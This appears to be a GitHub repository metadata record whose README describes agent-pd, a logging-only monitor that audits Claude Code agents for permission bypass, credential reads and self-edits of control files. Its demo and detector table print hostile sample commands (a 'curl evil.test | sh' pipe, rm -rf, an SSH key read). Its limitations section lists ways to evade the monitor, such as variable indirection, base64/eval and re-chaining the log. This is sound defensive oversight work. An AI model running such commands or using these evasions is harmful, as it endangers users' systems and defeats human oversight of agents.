{"id":51334232,"url":"https://github.com/varmabudharaju/agent-pd","last_synced_at":"2026-07-02T01:05:54.601Z","repository":{"id":361942914,"uuid":"1256394332","full_name":"varmabudharaju/agent-pd","owner":"varmabudharaju","description":"A police department for your Claude Code agents — a logging-only hook + CLI that audits the main agent and every subagent and reports rule offenses (permission bypass, out-of-scope \u0026 credential access, self-permissioning, disallowed tools, redundant, off-task) with quoted evidence. Catch-and-report, never blocks.","archived":false,"fork":false,"pushed_at":"2026-06-09T17:08:52.000Z","size":1906,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2026-06-09T19:06:06.979Z","etag":null,"topics":["agent-monitoring","ai-agents","ai-safety","audit-log","claude-code","cli","developer-tools","llm","observability","python","security","tamper-evident"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/varmabudharaju.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2026-06-01T18:30:11.000Z","updated_at":"2026-06-09T17:08:56.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/varmabudharaju/agent-pd","commit_stats":null,"previous_names":["varmabudharaju/agent-pd"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/varmabudharaju/agent-pd","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/varmabudharaju%2Fagent-pd","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/varmabudharaju%2Fagent-pd/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/varmabudharaju%2Fagent-pd/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/varmabudharaju%2Fagent-pd/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/varmabudharaju","download_url":"https://codeload.github.com/varmabudharaju/agent-pd/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/varmabudharaju%2Fagent-pd/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":35028671,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-07-01T02:00:05.325Z","response_time":130,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["agent-monitoring","ai-agents","ai-safety","audit-log","claude-code","cli","developer-tools","llm","observability","python","security","tamper-evident"],"created_at":"2026-07-02T01:05:53.999Z","updated_at":"2026-07-02T01:05:54.589Z","avatar_url":"https://github.com/varmabudharaju.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\n\n# agent-pd\n\n### A police department for your Claude Code agents\n\nA logging-only hook records every tool \u0026amp; permission event from the main agent **and** its\nsubagents; the `pd` CLI replays that log through six detectors and reports rule offenses with\nquoted evidence. **Catch-and-report — it never blocks.**\n\n[![License: Apache 2.0](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://github.com/varmabudharaju/agent-pd/blob/master/LICENSE)\n[![Python 3.11+](https://img.shields.io/badge/Python-3.11%2B-3776AB.svg?logo=python\u0026logoColor=white)](https://github.com/varmabudharaju/agent-pd/blob/master/pyproject.toml)\n[![Tests](https://img.shields.io/badge/tests-474_passing-brightgreen.svg)](https://github.com/varmabudharaju/agent-pd/tree/master/docs/manual-tests/)\n[![Version](https://img.shields.io/badge/version-0.2.0-orange.svg)](https://github.com/varmabudharaju/agent-pd/blob/master/pyproject.toml)\n[![Runtime deps](https://img.shields.io/badge/runtime_deps-PyYAML_only-lightgrey.svg)](https://github.com/varmabudharaju/agent-pd/blob/master/pyproject.toml)\n\n**[Quickstart](#quickstart)** · **[How it works](#how-it-works-mental-model)** · **[Detectors](#the-detectors)** · **[Architecture](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md)** · **[Security](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md)**\n\n\u003c/div\u003e\n\n## Caught on camera\n\n\u003e The department's body-cam. agent-pd won't stop the heist — but every move your agents make ends up on the record.\n\n\u003cdiv align=\"center\"\u003e\n\n\u003ca href=\"https://github.com/varmabudharaju/agent-pd/raw/master/docs/demo.mp4\"\u003e\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/demo.gif\" width=\"80%\" alt=\"agent-pd demo — the police scanner catching agents in the act\"\u003e\u003c/a\u003e\n\n\u003csub\u003e\u003ci\u003e▶ \u003ca href=\"https://github.com/varmabudharaju/agent-pd/raw/master/docs/demo.mp4\"\u003eWatch the full clip with sound\u003c/a\u003e\u003c/i\u003e\u003c/sub\u003e\n\n\u003c/div\u003e\n\n![capture vs. read](https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/diagrams/02-two-phase-flow.png)\n\n\u003e **Flight recorder + police scanner, not a firewall.** If you need to *stop* an action, that\n\u003e stays with Claude Code's permission prompts or an OS sandbox. agent-pd tells you what an agent\n\u003e did — faithfully, after the fact or live as it happens.\n\n**Highlights**\n\n- **Covers the main agent + every subagent**, including those spawned by Claude Code's new\n  dynamic **Workflow** tool (verified against recorded `workflow-subagent` hook events).\n- **Six deterministic detectors** at **zero token cost** — denied calls, out-of-scope \u0026amp;\n  credential access, permission bypass, self-permissioning, disallowed tools, off-task work.\n- **Tamper-evident audit log** (hash-chained) with an optional **off-host append-only sink**.\n- **Sessions are named, not UUIDs** — `pd list` and `pd watch` show each session's project\n  directory and first user prompt, derived from data already in the logs (works retroactively).\n- **Honest by design** — it raises the bar; it is **not** a sandbox. See [SECURITY.md](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md).\n\n**What it looks like** — `pd watch --all` across three concurrent sessions (three projects,\nmain agents + subagents with their briefs, two genuine flags and one borderline search among\nthe ordinary work):\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/03-pd-watch-all.png\" width=\"100%\" alt=\"pd watch --all: merged live feed across three sessions — § intro line per session, agent banners with briefs, two genuine flags (a credentials read and a denied curl|sh) and one off_task review\"/\u003e\n\n\u003e Every screenshot in this README is a real Terminal capture of the real engine replaying a\n\u003e seeded three-session fleet — reproduce them yourself with\n\u003e [`examples/demo-sessions.sh`](https://github.com/varmabudharaju/agent-pd/blob/master/examples/demo-sessions.sh).\n\n---\n\n## Why it exists\n\nClaude Code agents can read files, run shell commands, and spawn subagents. Most of that is\nfine — but you usually find out what an agent *actually did* only by scrolling a transcript,\nand **denied calls never reach the transcript at all** (Claude Code kills them first). agent-pd\ninstalls a hook that records every event to a per-session audit log, then gives you tools to\nask: *did any agent go out of scope, touch credentials, try to escalate, edit its own config,\nuse a tool it wasn't allowed, or wander off its brief?*\n\n---\n\n## How it works (mental model)\n\n```\n SETUP              CAPTURE (automatic, every session)        READ (per session or --all)\n pd install-hook  →  hook fires on every tool call        →   pd report   (forensic)\n      │                    │                                   pd watch    (live scanner)\n settings.json       ~/.claude/pd/audit/\u003csession\u003e.jsonl        pd judge    (opt-in LLM pass)\n```\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/diagrams/01-system-context.png\" width=\"560\" alt=\"agent-pd system context\"\u003e\n\u003c/p\u003e\n\n\u003e For the full picture — system context, component, sequence, detector-pipeline, and\n\u003e integrity diagrams (with rendered images) — see [ARCHITECTURE.md](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md).\n\n- **The hook is a dumb, crash-safe recorder.** Registered globally in `~/.claude/settings.json`\n  on PostToolUse / PermissionDenied / SubagentStart / SubagentStop. On each event it appends one\n  normalized, hash-chained line to a **per-session** audit file and **always exits 0** — it never\n  blocks, never loses an event, records all sessions concurrently.\n- **All the intelligence is in the reader.** `pd report` / `pd watch` correlate the audit log\n  (plus subagent transcripts and `meta.json` briefs) into per-agent records and run the\n  detectors. Zero LLM tokens — pure Python.\n- **Denied calls only exist in the audit log** — which is *why* the hook exists instead of just\n  parsing transcripts.\n\n---\n\n## Install\n\n```bash\npip install agent-pd     # from PyPI (core; PyYAML the only runtime dep)\npd install-hook          # idempotently registers the logging hook in ~/.claude/settings.json\n```\n\nThen just use Claude Code as normal. The hook records in the background.\n\n\u003e Optional LLM judge: `pip install \"agent-pd[judge]\"` adds the Anthropic SDK for `pd judge`.\n\u003e From source (dev): `pip install -e \".[judge]\"`.\n\n## Quickstart\n\n```bash\npd list                  # every session: id, project dir, last active, first prompt\npd report                # offense report for the most recent session\npd watch                 # live \"police scanner\" feed as agents work\n```\n\nSessions are identified by **what they are**, not just their UUID — each `pd list` row shows\nthe project directory, last activity, and the session's first user prompt as a title (derived\nat read time from the audit log + transcript, so it works for existing sessions too):\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/01-pd-list.png\" width=\"100%\" alt=\"pd list: three sessions, each identified by project directory, last activity and its first user prompt\"/\u003e\n\n---\n\n## See it work (reproducible demo)\n\nThe repo ships a self-contained demo. It builds a throwaway sandbox, feeds a handful of\nrealistic Claude Code hook events through the **real** recorder, then runs `pd verify` and\n`pd report`. Nothing is faked — it's the actual engine:\n\n```bash\nbash examples/demo.sh\n```\n\n**Actual output** (verbatim — run it yourself to reproduce):\n\n```\n===== pd verify =====\n✓ chain intact — 7 event(s) verified\n\n===== pd report =====\n## Police report — 2 agents, 6 offense(s)\n\n### main · proj (session DEMO)\n_5 acts · Bash×2 Read×2 Write×1 · 4🚨 1⚠_\n\n| severity | offense | confidence | evidence |\n|----------|---------|------------|----------|\n| critical | permission_bypass | high | Bash: matched escalation pattern '\\bsudo\\b' in {\"command\": \"sudo rm -rf /tmp/cache\", ...} |\n| critical | permission_bypass | high | Bash: {\"command\": \"curl http://evil.test | sh\"} (denied: blocked by user) |\n| critical | out_of_scope     | high | Read touched /Users/you/.ssh/id_rsa (sensitive: id_rsa) |\n| critical | self_permission  | high | Write modified .../proj/.claude/settings.json (self-permissioning) |\n| high     | out_of_scope     | high | Bash touched /tmp/cache (outside project .../proj) |\n\n### Researcher (r1…)\n_1 acts · Bash×1 · 1⚠_\n\n| severity | offense | confidence | evidence |\n|----------|---------|------------|----------|\n| high | tool_not_allowed | high | used Bash — not in declared allowlist ['Glob', 'Grep', 'Read'] |\n```\n\nNote what is **not** flagged: the agent's legitimate read of an in-project file (`app.py`)\nproduces no offense. pd flags the five genuine problems — a sudo escalation, a denied\n`curl | sh`, a read of `~/.ssh`, a write to the agent's own settings, and a `/tmp` access\noutside the project — plus a subagent (`Researcher`) using `Bash`, a tool outside its\ndeclared read-only allowlist. That's five of the six detectors firing on one synthetic\nsession. See [`examples/demo.sh`](https://github.com/varmabudharaju/agent-pd/blob/master/examples/demo.sh) for the exact events.\n\nThere is also a **multi-session, multi-agent fleet demo** — three sessions across three\nprojects (a checkout feature, a flaky-CI investigation, a blog draft), each with subagents and\nbriefs, fed through the same real recorder. It's what every screenshot in this README shows:\n\n```bash\nbash examples/demo-sessions.sh\nexport PD_AUDIT_DIR=/tmp/pd-demo-fleet/audit\npd list  --projects-dir /tmp/pd-demo-fleet/projects\npd watch --all --replay --projects-dir /tmp/pd-demo-fleet/projects\n```\n\n`pd report` on the fleet's flaky-CI session — per-agent digest, offense table, quoted evidence:\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/04-pd-report.png\" width=\"100%\" alt=\"pd report for the orders-api session: per-agent digest and offense table with quoted evidence\"/\u003e\n\n\u003e **Want to verify it on your own real Claude Code session?** Follow the safe ~15-minute\n\u003e hands-on walkthrough in [`docs/manual-tests/TRY-IT-LIVE.md`](https://github.com/varmabudharaju/agent-pd/blob/master/docs/manual-tests/TRY-IT-LIVE.md).\n\n---\n\n## Commands\n\n```bash\npd install-hook                       # register the logging hook (one-time)\npd list                               # every session: id · project · last active · “first prompt”\n\npd report                             # offense report, most recent session\npd report --session \u003cid\u003e --format md  # md | json | both\npd report --verbose                   # full evidence + files-touched per agent\npd report --agent \u003cid|main\u003e           # focus one agent: digest + every action it took\n\npd watch                              # live feed, most recent session — streams NEW activity\n                                      #   from now (like tail -f); existing backlog is skipped\npd watch --replay                     # replay the whole session's backlog first, then tail\npd watch --all                        # merged feed across ALL sessions (§session tag; an intro\n                                      #   line names each session's project + first prompt)\npd watch --crimes-only                # quiet unless something's wrong\npd watch --verbose                    # full commands + reasons, no truncation\npd watch --session \u003cid\u003e --no-color --no-emoji   # plain terminals / SSH\n\npd verify                             # check the audit-log hash-chain (most recent session)\npd verify --all                       # verify every session; exit 2 on tamper/truncation\n                                      # set PD_AUDIT_KEY for HMAC-keyed integrity\n\npd judge                              # dry run (free): items / agents / ≈token estimate\npd judge --run --via-claude-code      # confirm off_task flags on your Claude subscription\npd judge --run --model sonnet --max 20    # or via the metered Anthropic API\n\npd compact [--session ID] [--prune-older-than DAYS] [--dry-run]\n                                      # gzip old logs (\u003csid\u003e.jsonl -\u003e .jsonl.gz); skips the active\n                                      # session; lossless for detection. Optional age-based prune.\n\npd sink push [--session ID] [--all]   # forward un-sent chained events off-host (append-only sink)\npd sink status [--session ID] [--all] # forwarded/last per session; flags \"remote ahead\"\n```\n\n---\n\n## The detectors\n\nSix deterministic detectors (zero tokens) plus one opt-in LLM pass.\n\n| Offense | Severity | What it catches | Confidence |\n|---|---|---|---|\n| `permission_bypass` | critical | Denied calls + a **two-tier** Bash scan: never-downgrade catastrophic (`rm -rf /`, fork bomb, `curl\\|sh`, `dd of=/dev/…`) stay critical under any allow-rule; downgradable escalation (sudo, `chmod 777`, cwd-wipe) only by a precise rule. | high |\n| `out_of_scope` | high / critical | File **or** Bash path outside the project (auto: git root or cwd), or outside configured `scope_dirs`. Sensitive paths (`~/.ssh`, `~/.aws`, `~/.claude`, `/etc/shadow`, shell history…) are **always critical** and never downgraded. | high |\n| `self_permission` | critical | **Any** agent write to its own control files (`.claude/settings*.json`, `.claude/agents/*.md`, `pd-rules*.yaml`) via any method — Write/Edit/NotebookEdit or Bash `cp`/`mv`/`tee`/`sed`/`python`/`base64`/redirect — regardless of content. | high |\n| `tool_not_allowed` | high | A subagent uses a tool outside its declared `tools:` allowlist (`.claude/agents/\u003ctype\u003e.md`). | high |\n| `redundant` | low | Exact-duplicate tool calls (ignores Bash `description` noise). | high |\n| `off_task` | review | Search/query terms vs. the agent's brief, by word-overlap below a threshold. | **low — heuristic** |\n\nThe five deterministic detectors are trustworthy and free. `off_task` is intentionally noisy\nand hard-labeled low-confidence — the **judge** (below) turns it into high-confidence verdicts.\n\n### Permission-aware severity\n\n`out_of_scope` and escalation hits are **downgraded to a quiet `info` severity** when the action\nmatches a permission **allow-rule** you configured (`permissions.allow` in `~/.claude/settings.json`\nor project `.claude/settings.local.json`) — *authorized → info, unauthorized → full severity*.\n\nMatching is **faithful to Claude Code's own semantics**: shell-operator splitting (a `Bash(git:*)`\nrule does **not** license `git status \u0026\u0026 rm -rf ~`), command-substitution / backtick extraction,\nredirect targets as a separate authorization, word-boundary prefixes (`npm install:*` ≠\n`npm installmalware`), and gitignore-style globs. Ambiguity resolves **conservatively → not\npermitted** (under-flagging is worse than over-flagging). Two things are **never** downgraded:\nsensitive-path access and categorically-catastrophic commands. A denied call stays critical\nregardless — a denial is unpermitted by definition.\n\n### The off_task judge (`pd judge`) — opt-in, cost-capped\n\nAn optional LLM pass that reads each agent's brief and its flagged searches, then confirms or\ndrops the noisy `off_task` flags. Built to cost almost nothing:\n\n- **Opt-in** — never runs in the hook or `pd watch`.\n- **Dry-run by default** — prints an estimate; add `--run` to actually call.\n- **Pre-filtered + batched** — only already-flagged items, one API call per agent.\n- **Two backends:** `--via-claude-code` shells out to the headless `claude` CLI (**your Claude\n  subscription, no API key**), or the metered Anthropic API (`pip install -e \".[judge]\"` +\n  `ANTHROPIC_API_KEY`). `--model haiku|sonnet|opus` (default haiku), `--max N`.\n\nIn the demo fleet, the orders-api subagent rabbit-holed into a CI-infra search with zero\nword-overlap against its brief — the heuristic flags it for review, and the dry run prices\nout exactly what confirming it would cost:\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/07-pd-judge.png\" width=\"100%\" alt=\"pd judge dry run: the off_task heuristic flagged one borderline search; judging it would cost one batched haiku call — nothing runs without --run\"/\u003e\n\n---\n\n## Live view: `pd watch`\n\nA real-time feed of what your agents are doing and which rules they're breaking. The header\n**names the session it attached to** — project directory plus the session's first prompt — so\nattaching to the default (most recent) session is never a mystery:\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/02-pd-watch-header.png\" width=\"100%\" alt=\"pd watch header naming the watched session: its project directory and first prompt, not just the UUID\"/\u003e\n\nEach agent gets a stable color and a banner with its assigned brief; every action is a feed\nline with a severity badge; a live rap-sheet footer tallies crimes per agent. With `--all`\n(merged feed across every session) the first time a session appears it prints a\n`§sid · project · “title”` intro line, so interleaved sessions stay tellable-apart — see the\nfleet screenshot at the top of this README.\n\n`--crimes-only` keeps the feed quiet unless something is actually wrong — only flagged actions\nstream — and Ctrl-C prints a final **rap sheet** tallying every agent in every session:\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/06-pd-watch-crimes.png\" width=\"100%\" alt=\"pd watch --all --crimes-only: quiet unless something is wrong — only the flagged actions stream, and Ctrl-C prints the final rap sheet tallying every agent in every session\"/\u003e\n\nZero extra dependencies — ANSI only. The full annotated\nscreenshot set lives in [docs/test-evidence.md](https://github.com/varmabudharaju/agent-pd/blob/master/docs/test-evidence.md).\n\n---\n\n## Audit-log integrity \u0026 off-host sink\n\nEvery event carries a `seq` and a `chain = sha256(prev_chain + canonical(event))` (HMAC-SHA256\nif `PD_AUDIT_KEY` is set), computed by the hook under a per-session file lock with a\n`\u003csid\u003e.head.json` anchor. **`pd verify`** recomputes the chain and reports `✓ intact`,\n`✗ TAMPER DETECTED`, or `✗ TRUNCATED` (exit 2), and holds across `pd compact`. Here's it\ncatching both attacks for real — one event deleted from a log's tail, then one byte flipped\ninside a recorded command (the compacted session still verifies):\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/12-verify-tamper.png\" width=\"100%\" alt=\"pd verify pinpoints both attacks: the truncated session is flagged TRUNCATED, and one flipped byte is flagged TAMPER DETECTED at seq 7, while the compacted session still verifies\"/\u003e\n\nThis is tamper-**evident**, not tamper-**proof**: a same-user agent with Bash can re-chain the\nwhole file. To close the *retroactive-deletion* half of that gap, **`pd sink push`** forwards each\nchained event to an **off-host, append-only destination** (file or http backend; env-only\n`PD_SINK_TOKEN`; `https://` enforced for remote tokens; redirects not followed). Once an event has\nshipped off-host, a later local rewrite can't reach it. **`pd sink status`** flags \"remote ahead\"\nwhen more events shipped than remain locally — a truncation signal:\n\n\u003cimg src=\"https://raw.githubusercontent.com/varmabudharaju/agent-pd/master/docs/screenshots/demo/10-sink-remote-ahead.png\" width=\"100%\" alt=\"pd sink: push all chained events to the off-host sink, status shows fully forwarded; after deleting one local event, status flags remote ahead — possible local tampering\"/\u003e\n\n\u003e Append-only is a **deployment requirement** pd can't enforce, and the sink does not stop a\n\u003e same-user agent from *forging* entries or *disabling* the hook. Read [SECURITY.md](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md)\n\u003e for the full, honest framing before relying on any of this.\n\n---\n\n## What's lacking (honest limitations)\n\nagent-pd **raises the bar; it is not a sandbox.** A determined same-privilege adversary using\nobfuscation or indirection can evade static detection. Known limits, in plain terms:\n\n- **Obfuscation / indirection evades static detection.** Multi-level `$VAR` chains\n  (`A=/etc/shadow; B=$A; cat $B` — only single-level expansion is followed), `$IFS` / word-split\n  tricks, two-step download-then-exec (`curl -o f url; sh f`), base64/eval-assembled commands, and\n  dynamically-built paths can slip past.\n- **Non-Bash file-write MCP tools bypass `self_permission`.** Only Write/Edit/NotebookEdit and\n  Bash are inspected for control-file writes; a filesystem MCP tool with a different shape could\n  write `.claude/settings.json` undetected.\n- **`off_task` is heuristic** (word-overlap) and can't run on the main agent or on Workflow\n  subagents (no brief). `pd judge` is the trustworthy path.\n- **`~/.config` sensitivity is broad** and can be noisy (it holds innocuous app config too).\n- **Tool *results* aren't surfaced** — the hook captures `tool_input` and an outcome flag, not full\n  `tool_response`, to keep the audit log from bloating. The feed shows what an agent *did*, not its\n  output.\n- **Audit integrity is tamper-evident, not tamper-proof** (above), and the off-host sink's\n  append-only guarantee is the operator's responsibility.\n- **Symlink resolution is best-effort** (the symlink must exist at analysis time).\n- **Sessions that predate the hook** (transcript-only, no `\u003csid\u003e.jsonl`) don't appear in `pd report`.\n\nThe full ledger of shipped / residual / declined items lives in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).\n\n## How it can be improved (roadmap)\n\nPrioritized, none blocking — scoped so any one can be picked up independently:\n\n1. **Tool-agnostic control-file detection** — flag *any* tool whose input names a control path in\n   a write-shaped field (closes the MCP `self_permission` gap).\n2. **Multi-level `$VAR` resolution** — iterate variable substitution to a fixed point so 2-hop\n   indirection (`B=$A`) no longer hides a sensitive path.\n3. **Truncate / cap `tool_result`** at capture to keep raw `.jsonl` small.\n4. **Narrow `~/.config` sensitivity** to credential-bearing subpaths (`gh`, `gcloud`, …) to cut noise.\n5. **Sink enhancements** — chunk large backlogs, a syslog backend, and `pd verify --against-sink`\n   read-back reconciliation.\n6. **`pd summary \u003csession\u003e`** — per-agent digest (files touched, time span, tool histogram).\n7. **Judge verdict disk cache** — skip re-judging identical (brief, search) pairs.\n8. **Capture more hook events** (`PostToolUseFailure`, `PreCompact`, `SessionEnd`) to enrich timelines.\n\n---\n\n## Configuration\n\nagent-pd works out of the box with no config — every rule (sensitive paths, escalation\npatterns, severities, the `off_task` threshold) ships as a built-in default. A `pd-rules.yaml`\nfile is **optional**, and only needed to override those defaults.\n\nWhen you do write one, every command **auto-discovers** it — no flag required. On each run `pd`\nlooks for `pd-rules.yaml` in this order and uses the first it finds, deep-merged over the\nbuilt-in defaults:\n\n1. the current directory\n2. the enclosing **project root** (the git root above the cwd)\n3. `~/.claude/pd-rules.yaml` (a global default for all projects)\n\nPrecedence is **`--rules \u003cpath\u003e` › auto-discovered file › built-in defaults** — pass `--rules`\non any command (including `pd watch`) to point at a specific file and override discovery. See\n`pd-rules.yaml` in this repo for every supported key (`scope_dirs`, sensitive paths, the two\nescalation tiers, severities, `off_task_overlap_threshold`, `storage`, and a `sink` section).\n\n\u003e Lists in `pd-rules.yaml` **replace** the corresponding default list (deep-merge replaces\n\u003e lists, not appends) — so if you set `sensitive_patterns`, include the built-ins you still want.\n\nThe off-host sink also reads env overrides: `PD_SINK_TYPE=file|http`, `PD_SINK_PATH` /\n`PD_SINK_URL`, `PD_SINK_TIMEOUT`, and the **env-only** `PD_SINK_TOKEN` (ignored if placed in a\nconfig file, so it never lands in a checked-in or world-readable file).\n\n## Storage \u0026 privacy\n\n```\n~/.claude/pd/audit/\u003csid\u003e.jsonl      # live capture (hook appends here)\n~/.claude/pd/audit/\u003csid\u003e.jsonl.gz   # compacted (pd compact, gzip)\n```\n\nThe audit log stores **full tool inputs** — file contents and Bash commands — which **may include\nsecrets in plaintext**. It lives **outside your repo** (won't be committed by accident) but treat\nit like any sensitive local file. `pd compact` gzips, it does **not** encrypt. Nothing is uploaded\nunless you configure a sink. To clear it: `rm ~/.claude/pd/audit/*.jsonl` (it repopulates as\nsessions run).\n\n**Choosing where logs go.** The default is deliberately a hidden, local, non-repo path. To put\nlogs somewhere you choose, set `PD_AUDIT_DIR`, or bake it into the hook at install time:\n\n```bash\npd install-hook --audit-dir ~/agent-pd-logs   # hook + CLI both use this path\n# or, per shell: export PD_AUDIT_DIR=~/agent-pd-logs\n```\n\nBoth the hook (writes) and every `pd` command (reads) honor `PD_AUDIT_DIR` (precedence:\n`--audit-dir` flag › `PD_AUDIT_DIR` › default). A **relative** path is resolved to an absolute\none when it's set (the install flag bakes the absolute path; `PD_AUDIT_DIR` is absolutized when\nread), so logs always land in one fixed place instead of scattering into whatever directory each\nagent happens to run in. Still, **don't** point it at a repo folder or a cloud-synced directory\n(iCloud/Dropbox) unless you accept that plaintext tool inputs — possibly secrets — will be\ncommitted or synced off-machine.\n\n## Development\n\n```bash\npip install --user -e .          # core\npip install --user -e \".[judge]\" # + anthropic SDK (only for the API judge backend)\npython3 -m pytest -q             # 474 tests, pure (no API key needed)\n```\n\nTDD throughout; detectors, render, live, and judge are all unit-tested with no network. For the\ndesign in depth: [SYSTEM-DESIGN.md](https://github.com/varmabudharaju/agent-pd/blob/master/SYSTEM-DESIGN.md) (formal design doc — goals, components,\npermission model, trade-offs) and [ARCHITECTURE.md](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md) (diagrams). Honest\nlimitations and roadmap live in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).\n\n## License\n\n[Apache License 2.0](https://github.com/varmabudharaju/agent-pd/blob/master/LICENSE) © Sai Ram Varma Budharaju. Free to use, modify, and distribute (including\ncommercially); retain the copyright and license notice. Includes a patent grant.\n\u003c/content\u003e\n\u003c/invoke\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvarmabudharaju%2Fagent-pd","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvarmabudharaju%2Fagent-pd","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvarmabudharaju%2Fagent-pd/lists"}